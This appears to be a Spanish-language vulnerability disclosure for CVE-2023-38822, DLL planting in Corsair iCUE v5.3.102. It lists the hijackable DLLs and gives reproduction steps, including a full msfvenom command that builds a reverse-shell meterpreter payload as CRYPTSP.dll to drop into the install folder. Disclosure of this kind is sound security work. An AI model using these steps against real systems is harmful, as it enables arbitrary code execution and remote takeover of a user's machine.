Corsair---DLL-Planting-CVE-2023-38822
Plantación de DLL en Corsair iCUE v.5.3.102 CVE-2023-38822
Descubridor: Idan Malihi
Descripción
Un problema en Corsair iCUE v.5.3.102 permite a un atacante local ejecutar código arbitrario a través de los componentes MPDC.dll, CRYPTSP.dll, dcomp.dll, profapi.dll y MSASN1.dll.
Pasos para Reproducir
Para explotar la vulnerabilidad de Plantación de DLL, un atacante debe seguir los siguientes pasos:
- Descargar la última versión de iCUE.
- Instalar el producto iCUE.
- Abrir la carpeta de la ruta de instalación, por ejemplo, C:\Program Files\Corsair\Corsair iCUE5 Software\
- Crear un archivo dll malicioso con msfvenom en el sistema operativo Kali Linux:
msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o CRYPTSP.dll
- Transferir el archivo DLL a la ruta del juego C:\Program Files\Corsair\Corsair iCUE5 Software\
- Ejecutar iCUE.exe y obtener una reverse shell.